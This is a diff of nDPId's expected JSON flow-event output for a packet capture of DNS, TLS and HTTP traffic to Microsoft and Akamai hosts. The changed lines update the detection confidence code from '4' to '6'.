+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077590,"flow_last_seen":1626168077590,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1626168077590,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":58161,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"www.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00786{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1626168077604,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"thread_ts_msec":1626168077604,"pkt":"8BiYFWV8WNVuaKQACABFAAETO6UAAHgRNAQICAgIwKgBeQA1yKQA\/zFnycWBgAABAAMAAQAAA3d3dwltaWNyb3NvZnQDY29tAABBAAHADAAFAAEAAAelACMDd3d3CW1pY3Jvc29mdAdjb20tYy0zB2VkZ2VrZXkDbmV0AMAvAAUAAQAAAHAANwN3d3cJbWljcm9zb2Z0B2NvbS1jLTMHZWRnZWtleQNuZXQLZ2xvYmFscmVkaXIGYWthZG5zwE3AXgAFAAEAAAAZABkGZTEzNjc4BGRzY2IKYWthbWFpZWRnZcBNwKgABgABAAAAMgAxBm4wZHNjYsCtCmhvc3RtYXN0ZXIGYWthbWFpwBpg7VdYAAAD6AAAA+gAAAPoAAAHCA=="} -00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":60,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077590,"flow_last_seen":1626168077604,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1626168077604,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51364,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"www.microsoft.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":65,"rsp_type":5,"rsp_addr":"0.0.0.0"}} 
+00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":60,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077590,"flow_last_seen":1626168077604,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1626168077604,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51364,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"www.microsoft.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":65,"rsp_type":5,"rsp_addr":"0.0.0.0"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077604,"flow_last_seen":1626168077604,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1626168077604,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":55578,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1626168077604,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1626168077604,"pkt":"WNVuaKQA8BiYFWV8CABFAABIwDAAAEAR6EPAqAF5CAgICNkaADUANI8rXZMBAAABAAAAAAAABmUxMzY3OARkc2NiCmFrYW1haWVkZ2UDbmV0AABBAAE="} 
-00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077604,"flow_last_seen":1626168077604,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1626168077604,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":55578,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"e13678.dscb.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":65,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077604,"flow_last_seen":1626168077604,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1626168077604,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":55578,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"e13678.dscb.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":65,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":62,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077604,"flow_last_seen":1626168077604,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1626168077604,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":54561,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1626168077604,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1626168077604,"pkt":"WNVuaKQA8BiYFWV8CABFAABIJH8AAEARg\/XAqAF5CAgICNUhADUANLCIQG8BAAABAAAAAAAABmUxMzY3OARkc2NiCmFrYW1haWVkZ2UDbmV0AAABAAE="} -00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077604,"flow_last_seen":1626168077604,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1626168077604,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":54561,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"e13678.dscb.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
-01413{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":65,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168077506,"flow_last_seen":1626168077607,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":1626168077607,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53911,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} +00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077604,"flow_last_seen":1626168077604,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1626168077604,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":54561,"dst_port":53,"l4_proto":"udp","ndpi": 
{"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"e13678.dscb.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +01413{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":65,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168077506,"flow_last_seen":1626168077607,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":1626168077607,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53911,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} 
00597{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1626168077619,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":150,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":150,"pkt_l4_len":116,"thread_ts_msec":1626168077619,"pkt":"8BiYFWV8WNVuaKQACABFAACITIkAAHkRIqsICAgIwKgBeQA12RoAdB3yXZOBgAABAAAAAQAABmUxMzY3OARkc2NiCmFrYW1haWVkZ2UDbmV0AABBAAHAEwAGAAEAAAKpADQGbjBkc2NiwBgKaG9zdG1hc3RlcgZha2FtYWkDY29tAGDtWc8AAAPoAAAD6AAAA+gAAAcI"} -00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077604,"flow_last_seen":1626168077619,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1626168077619,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":55578,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"e13678.dscb.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":65,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077604,"flow_last_seen":1626168077619,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1626168077619,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":55578,"dst_port":53,"l4_proto":"udp","ndpi": 
{"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"e13678.dscb.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":65,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":70,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077620,"flow_last_seen":1626168077620,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168077620,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53912,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1626168077620,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168077620,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGVJbAqAF5AhYh69KYAFDHEa2yAAAAALAC\/\/\/SXgAAAgQFtAEDAwYBAQgKPdH4\/AAAAAAEAgAA"} 
00725{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1626168077622,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":244,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":244,"pkt_l4_len":210,"thread_ts_msec":1626168077622,"pkt":"8BiYFWV8WNVuaKQACABFAADmBoMAAHgRaVMICAgIwKgBeQA14zEA0sNDCy+BgAABAAQAAAAAA3d3dwltaWNyb3NvZnQDY29tAAABAAHADAAFAAEAAAosACMDd3d3CW1pY3Jvc29mdAdjb20tYy0zB2VkZ2VrZXkDbmV0AMAvAAUAAQAAAyUANwN3d3cJbWljcm9zb2Z0B2NvbS1jLTMHZWRnZWtleQNuZXQLZ2xvYmFscmVkaXIGYWthZG5zwE3AXgAFAAEAAAMDABkGZTEzNjc4BGRzY2IKYWthbWFpZWRnZcBNwKEAAQABAAAAEwAEAhYh6w=="} -00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":71,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077590,"flow_last_seen":1626168077622,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1626168077622,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":58161,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"www.microsoft.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"2.22.33.235"}} 
+00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":71,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077590,"flow_last_seen":1626168077622,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1626168077622,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":58161,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"www.microsoft.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"2.22.33.235"}} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1626168077632,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1626168077632,"pkt":"8BiYFWV8WNVuaKQACABFAAA8AABAADkGW5oCFiHrwKgBeQBQ0pgVbXIGxxGts6AS\/oilegAAAgQFtAQCCAqgBBfWPdH4\/AEDAwc="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1626168077632,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168077632,"pkt":"WNVuaKQA8BiYFWV8CABFAAA0AABAAEAGVKLAqAF5AhYh69KYAFDHEa2zFW1yB4AQCArKugAAAQEICj3R+QegBBfW"} 
-00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077620,"flow_last_seen":1626168077632,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1626168077632,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53912,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Cloud"},"http": {"hostname":"www.microsoft.com","url":"www.microsoft.com\/pki\/certs\/MicRooCerAut2011_2011_03_22.crt","code":0,"content_type":"","user_agent":"com.apple.trustd\/2.0"}} +00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077620,"flow_last_seen":1626168077632,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1626168077632,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53912,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Cloud"},"http": {"hostname":"www.microsoft.com","url":"www.microsoft.com\/pki\/certs\/MicRooCerAut2011_2011_03_22.crt","code":0,"content_type":"","user_agent":"com.apple.trustd\/2.0"}} 
00532{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1626168077633,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1626168077633,"pkt":"8BiYFWV8WNVuaKQACABFAABYGXsAAHgRVukICAgIwKgBeQA11SEAREvAQG+BgAABAAEAAAAABmUxMzY3OARkc2NiCmFrYW1haWVkZ2UDbmV0AAABAAHADAABAAEAAAATAAQCFiHr"} -00807{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":75,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077604,"flow_last_seen":1626168077633,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1626168077633,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":54561,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"e13678.dscb.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"2.22.33.235"}} -00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":77,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1626168077620,"flow_last_seen":1626168077654,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":1647,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1626168077654,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53912,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary App 
Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Download"},"http": {"hostname":"www.microsoft.com","url":"www.microsoft.com\/pki\/certs\/MicRooCerAut2011_2011_03_22.crt","code":200,"content_type":"application\/octet-stream","user_agent":"com.apple.trustd\/2.0"}} +00807{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":75,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077604,"flow_last_seen":1626168077633,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1626168077633,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":54561,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"e13678.dscb.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"2.22.33.235"}} +00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":77,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1626168077620,"flow_last_seen":1626168077654,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":1647,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1626168077654,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53912,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Download"},"http": 
{"hostname":"www.microsoft.com","url":"www.microsoft.com\/pki\/certs\/MicRooCerAut2011_2011_03_22.crt","code":200,"content_type":"application\/octet-stream","user_agent":"com.apple.trustd\/2.0"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077660,"flow_last_seen":1626168077660,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168077660,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53913,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1626168077660,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168077660,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGVJbAqAF5AhYh69KZAFBWi1SkAAAAALAC\/\/+bzgAAAgQFtAEDAwYBAQgKPdH5IAAAAAAEAgAA"} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1626168077670,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1626168077670,"pkt":"8BiYFWV8WNVuaKQACABFAAA8AABAADkGW5oCFiHrwKgBeQBQ0pnFRlw1VotUpaAS\/ohpIwAAAgQFtAQCCAqAXqM6PdH5IAEDAwc="} 
